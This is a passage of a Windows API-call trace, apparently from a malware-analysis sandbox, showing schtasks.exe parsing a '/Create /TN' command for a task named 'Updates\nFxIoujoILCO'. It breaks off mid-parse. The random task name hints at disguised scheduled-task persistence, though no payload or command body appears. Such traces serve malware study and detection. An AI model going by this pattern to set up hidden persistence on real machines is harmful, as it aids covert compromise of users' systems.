[0154.027] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2969a0) returned 0x8
[0154.027] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2969a0 | out: hHeap=0x280000) returned 1
[0154.028] GetProcessHeap () returned 0x280000
[0154.028] GetProcessHeap () returned 0x280000
[0154.028] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295360) returned 1
[0154.028] GetProcessHeap () returned 0x280000
[0154.028] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295360) returned 0x14
[0154.028] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295360 | out: hHeap=0x280000) returned 1
[0154.028] GetProcessHeap () returned 0x280000
[0154.028] GetProcessHeap () returned 0x280000
[0154.028] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2969b0) returned 1
[0154.028] GetProcessHeap () returned 0x280000
[0154.028] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2969b0) returned 0x2a
[0154.029] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2969b0 | out: hHeap=0x280000) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2953a0) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2953a0) returned 0x14
[0154.029] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2953a0 | out: hHeap=0x280000) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294cf8) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294cf8) returned 0xa
[0154.029] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294cf8 | out: hHeap=0x280000) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2953c0) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2953c0) returned 0x14
[0154.029] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2953c0 | out: hHeap=0x280000) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x296a58) returned 1
[0154.029] GetProcessHeap () returned 0x280000
[0154.029] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x296a58) returned 0x64
[0154.030] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296a58 | out: hHeap=0x280000) returned 1
[0154.030] GetProcessHeap () returned 0x280000
[0154.030] GetProcessHeap () returned 0x280000
[0154.030] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2953e0) returned 1
[0154.030] GetProcessHeap () returned 0x280000
[0154.030] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2953e0) returned 0x14
[0154.030] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2953e0 | out: hHeap=0x280000) returned 1
[0154.030] GetProcessHeap () returned 0x280000
[0154.030] GetProcessHeap () returned 0x280000
[0154.030] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x28f0a0) returned 1
[0154.030] GetProcessHeap () returned 0x280000
[0154.030] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x28f0a0) returned 0x10
[0154.030] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x28f0a0 | out: hHeap=0x280000) returned 1
[0154.031] SetLastError (dwErrCode=0x0)
[0154.031] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0154.031] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0154.031] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0154.031] VerifyVersionInfoW (in: lpVersionInformation=0xdcaa4, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0xdcaa4) returned 1
[0154.031] SetLastError (dwErrCode=0x0)
[0154.031] lstrlenW (lpString="create") returned 6
[0154.031] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0
[0154.031] SetLastError (dwErrCode=0x490)
[0154.031] SetLastError (dwErrCode=0x0)
[0154.031] lstrlenW (lpString="create") returned 6
[0154.031] GetProcessHeap () returned 0x280000
[0154.031] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2953e0
[0154.031] GetProcessHeap () returned 0x280000
[0154.031] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x28f0a0
[0154.031] _memicmp (_Buf1=0x28f0a0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.031] GetProcessHeap () returned 0x280000
[0154.031] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x16) returned 0x2953c0
[0154.031] SetLastError (dwErrCode=0x0)
[0154.032] _memicmp (_Buf1=0x294c50, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.032] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x295ac8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0154.032] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0154.032] GetProcessHeap () returned 0x280000
[0154.032] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x74e) returned 0x295cd8
[0154.032] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x295cd8 | out: lpData=0x295cd8) returned 1
[0154.032] VerQueryValueW (in: pBlock=0x295cd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdcbac, puLen=0xdcbb0 | out: lplpBuffer=0xdcbac*=0x296074, puLen=0xdcbb0) returned 1
[0154.032] _memicmp (_Buf1=0x294c50, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.032] _vsnwprintf (in: _Buffer=0x295ac8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdcb94 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0154.032] VerQueryValueW (in: pBlock=0x295cd8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdcbbc, puLen=0xdcbb8 | out: lplpBuffer=0xdcbbc*=0x295ea0, puLen=0xdcbb8) returned 1
[0154.032] lstrlenW (lpString="schtasks.exe") returned 12
[0154.032] lstrlenW (lpString="schtasks.exe") returned 12
[0154.033] lstrlenW (lpString=".EXE") returned 4
[0154.033] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0154.033] lstrlenW (lpString="schtasks.exe") returned 12
[0154.033] lstrlenW (lpString=".EXE") returned 4
[0154.033] lstrlenW (lpString="schtasks") returned 8
[0154.033] lstrlenW (lpString="/create") returned 7
[0154.033] _memicmp (_Buf1=0x294c50, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.033] _vsnwprintf (in: _Buffer=0x295ac8, _BufferCount=0x19, _Format="%s %s", _ArgList=0xdcb94 | out: _Buffer="schtasks /create") returned 16
[0154.033] _memicmp (_Buf1=0x294cb0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.033] GetProcessHeap () returned 0x280000
[0154.033] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2953a0
[0154.033] _memicmp (_Buf1=0x294cc8, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.033] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x296760, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0154.033] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0154.033] GetProcessHeap () returned 0x280000
[0154.033] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x30) returned 0x2969a0
[0154.033] _vsnwprintf (in: _Buffer=0x2966b8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdcb98 | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37
[0154.033] GetProcessHeap () returned 0x280000
[0154.033] GetProcessHeap () returned 0x280000
[0154.033] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295cd8) returned 1
[0154.033] GetProcessHeap () returned 0x280000
[0154.033] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295cd8) returned 0x74e
[0154.034] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295cd8 | out: hHeap=0x280000) returned 1
[0154.034] SetLastError (dwErrCode=0x0)
[0154.034] GetThreadLocale () returned 0x409
[0154.034] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.034] lstrlenW (lpString="create") returned 6
[0154.034] GetThreadLocale () returned 0x409
[0154.034] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.034] lstrlenW (lpString="?") returned 1
[0154.034] GetThreadLocale () returned 0x409
[0154.034] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.034] lstrlenW (lpString="s") returned 1
[0154.034] GetThreadLocale () returned 0x409
[0154.034] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.034] lstrlenW (lpString="u") returned 1
[0154.034] GetThreadLocale () returned 0x409
[0154.034] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.034] lstrlenW (lpString="p") returned 1
[0154.034] GetThreadLocale () returned 0x409
[0154.034] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.034] lstrlenW (lpString="ru") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="rp") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="sc") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="mo") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="d") returned 1
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="m") returned 1
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="i") returned 1
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="tn") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="tr") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="st") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.035] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.035] lstrlenW (lpString="sd") returned 2
[0154.035] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="ed") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="it") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="et") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="k") returned 1
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="du") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="ri") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="z") returned 1
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="f") returned 1
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="v1") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="xml") returned 3
[0154.036] GetThreadLocale () returned 0x409
[0154.036] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.036] lstrlenW (lpString="ec") returned 2
[0154.036] GetThreadLocale () returned 0x409
[0154.037] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.037] lstrlenW (lpString="rl") returned 2
[0154.037] GetThreadLocale () returned 0x409
[0154.037] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.037] lstrlenW (lpString="delay") returned 5
[0154.037] GetThreadLocale () returned 0x409
[0154.037] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0154.037] lstrlenW (lpString="np") returned 2
[0154.037] SetLastError (dwErrCode=0x0)
[0154.037] SetLastError (dwErrCode=0x0)
[0154.037] lstrlenW (lpString="/Create") returned 7
[0154.037] lstrlenW (lpString="-/") returned 2
[0154.037] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0154.037] lstrlenW (lpString="create") returned 6
[0154.037] lstrlenW (lpString="create") returned 6
[0154.037] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.037] lstrlenW (lpString="Create") returned 6
[0154.037] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.037] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|create|") returned 8
[0154.037] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|Create|") returned 8
[0154.037] lstrlenW (lpString="|create|") returned 8
[0154.037] lstrlenW (lpString="|Create|") returned 8
[0154.037] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0154.037] SetLastError (dwErrCode=0x0)
[0154.037] SetLastError (dwErrCode=0x0)
[0154.037] SetLastError (dwErrCode=0x0)
[0154.037] lstrlenW (lpString="/TN") returned 3
[0154.038] lstrlenW (lpString="-/") returned 2
[0154.038] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0154.038] lstrlenW (lpString="create") returned 6
[0154.038] lstrlenW (lpString="create") returned 6
[0154.038] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.038] lstrlenW (lpString="TN") returned 2
[0154.038] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.038] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|create|") returned 8
[0154.038] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.038] lstrlenW (lpString="|create|") returned 8
[0154.038] lstrlenW (lpString="|TN|") returned 4
[0154.038] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0154.038] SetLastError (dwErrCode=0x490)
[0154.038] lstrlenW (lpString="?") returned 1
[0154.038] lstrlenW (lpString="?") returned 1
[0154.038] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.038] lstrlenW (lpString="TN") returned 2
[0154.038] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.038] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|?|") returned 3
[0154.038] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.038] lstrlenW (lpString="|?|") returned 3
[0154.038] lstrlenW (lpString="|TN|") returned 4
[0154.038] SetLastError (dwErrCode=0x490)
[0154.038] lstrlenW (lpString="s") returned 1
[0154.038] lstrlenW (lpString="s") returned 1
[0154.038] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.038] lstrlenW (lpString="TN") returned 2
[0154.039] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.039] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|s|") returned 3
[0154.039] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.039] lstrlenW (lpString="|s|") returned 3
[0154.039] lstrlenW (lpString="|TN|") returned 4
[0154.039] SetLastError (dwErrCode=0x490)
[0154.039] lstrlenW (lpString="u") returned 1
[0154.039] lstrlenW (lpString="u") returned 1
[0154.039] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.039] lstrlenW (lpString="TN") returned 2
[0154.039] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.039] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|u|") returned 3
[0154.039] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.039] lstrlenW (lpString="|u|") returned 3
[0154.039] lstrlenW (lpString="|TN|") returned 4
[0154.039] SetLastError (dwErrCode=0x490)
[0154.039] lstrlenW (lpString="p") returned 1
[0154.039] lstrlenW (lpString="p") returned 1
[0154.039] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.039] lstrlenW (lpString="TN") returned 2
[0154.039] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.039] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|p|") returned 3
[0154.039] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.039] lstrlenW (lpString="|p|") returned 3
[0154.039] lstrlenW (lpString="|TN|") returned 4
[0154.039] SetLastError (dwErrCode=0x490)
[0154.039] lstrlenW (lpString="ru") returned 2
[0154.040] lstrlenW (lpString="ru") returned 2
[0154.040] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.040] lstrlenW (lpString="TN") returned 2
[0154.040] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.040] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|ru|") returned 4
[0154.040] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.040] lstrlenW (lpString="|ru|") returned 4
[0154.040] lstrlenW (lpString="|TN|") returned 4
[0154.040] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0
[0154.040] SetLastError (dwErrCode=0x490)
[0154.040] lstrlenW (lpString="rp") returned 2
[0154.040] lstrlenW (lpString="rp") returned 2
[0154.040] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.040] lstrlenW (lpString="TN") returned 2
[0154.040] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.040] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|rp|") returned 4
[0154.040] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.040] lstrlenW (lpString="|rp|") returned 4
[0154.040] lstrlenW (lpString="|TN|") returned 4
[0154.040] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0
[0154.040] SetLastError (dwErrCode=0x490)
[0154.040] lstrlenW (lpString="sc") returned 2
[0154.040] lstrlenW (lpString="sc") returned 2
[0154.040] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.040] lstrlenW (lpString="TN") returned 2
[0154.040] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.041] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|sc|") returned 4
[0154.041] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.041] lstrlenW (lpString="|sc|") returned 4
[0154.041] lstrlenW (lpString="|TN|") returned 4
[0154.041] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0
[0154.041] SetLastError (dwErrCode=0x490)
[0154.041] lstrlenW (lpString="mo") returned 2
[0154.041] lstrlenW (lpString="mo") returned 2
[0154.041] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.041] lstrlenW (lpString="TN") returned 2
[0154.041] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.041] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|mo|") returned 4
[0154.041] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.041] lstrlenW (lpString="|mo|") returned 4
[0154.041] lstrlenW (lpString="|TN|") returned 4
[0154.041] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0
[0154.041] SetLastError (dwErrCode=0x490)
[0154.041] lstrlenW (lpString="d") returned 1
[0154.041] lstrlenW (lpString="d") returned 1
[0154.041] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.041] lstrlenW (lpString="TN") returned 2
[0154.041] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.042] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|d|") returned 3
[0154.042] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.042] lstrlenW (lpString="|d|") returned 3
[0154.042] lstrlenW (lpString="|TN|") returned 4
[0154.042] SetLastError (dwErrCode=0x490)
[0154.042] lstrlenW (lpString="m") returned 1
[0154.042] lstrlenW (lpString="m") returned 1
[0154.042] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.042] lstrlenW (lpString="TN") returned 2
[0154.042] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.042] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|m|") returned 3
[0154.042] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.042] lstrlenW (lpString="|m|") returned 3
[0154.042] lstrlenW (lpString="|TN|") returned 4
[0154.042] SetLastError (dwErrCode=0x490)
[0154.042] lstrlenW (lpString="i") returned 1
[0154.042] lstrlenW (lpString="i") returned 1
[0154.042] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.042] lstrlenW (lpString="TN") returned 2
[0154.042] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.042] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|i|") returned 3
[0154.042] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.042] lstrlenW (lpString="|i|") returned 3
[0154.042] lstrlenW (lpString="|TN|") returned 4
[0154.042] SetLastError (dwErrCode=0x490)
[0154.043] lstrlenW (lpString="tn") returned 2
[0154.043] lstrlenW (lpString="tn") returned 2
[0154.043] _memicmp (_Buf1=0x294ce0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.043] lstrlenW (lpString="TN") returned 2
[0154.043] _memicmp (_Buf1=0x294d10, _Buf2=0x771ed8, _Size=0x7) returned 0
[0154.043] _vsnwprintf (in: _Buffer=0x295380, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|tn|") returned 4
[0154.043] _vsnwprintf (in: _Buffer=0x295340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcb80 | out: _Buffer="|TN|") returned 4
[0154.043] lstrlenW (lpString="|tn|") returned 4
[0154.043] lstrlenW (lpString="|TN|") returned 4
[0154.043] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|"
[0154.043] SetLastError (dwErrCode=0x0)
[0154.043] SetLastError (dwErrCode=0x0)
[0154.043] lstrlenW (lpString="Updates\\nFxIoujoILCO") returned 20
[0154.043] lstrlenW (lpString="-/") returned 2
[0154.043] StrChrIW (lpStart="-/", wMatch=0x55) returned 0x0
